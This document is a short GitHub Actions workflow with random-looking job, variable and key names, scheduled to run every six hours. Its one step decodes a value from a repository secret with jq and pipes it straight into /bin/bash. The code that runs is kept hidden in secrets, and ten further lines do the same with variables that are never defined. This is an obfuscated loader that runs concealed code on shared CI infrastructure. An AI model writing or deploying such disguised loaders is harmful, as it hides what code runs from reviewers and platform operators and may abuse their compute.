name: huojiaquan3627
on:
  workflow_dispatch:
  schedule:
    - cron: '40 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huojiaquan3627
        env:
          kkh1429: ${{ secrets.kkh1429 }}
        run: |
          echo $kkh1429 | jq -r .csnk58 | /bin/bash
          echo $ai6409 | jq -r .gw686 | /bin/bash
          echo $ylwa83501 | jq -r .tywj34 | /bin/bash
          echo $dk82742 | jq -r .ubgjm9 | /bin/bash
          echo $bqmmk8812 | jq -r .vvw749 | /bin/bash
          echo $jvut564 | jq -r .zjs37171 | /bin/bash
          echo $vycs3864 | jq -r .tnony3 | /bin/bash
          echo $gbmmo250 | jq -r .vflh79355 | /bin/bash
          echo $tzgyu85970 | jq -r .qhom7189 | /bin/bash
          echo $rwmni62658 | jq -r .e81730 | /bin/bash
          echo $wqghw856 | jq -r .aq064 | /bin/bash

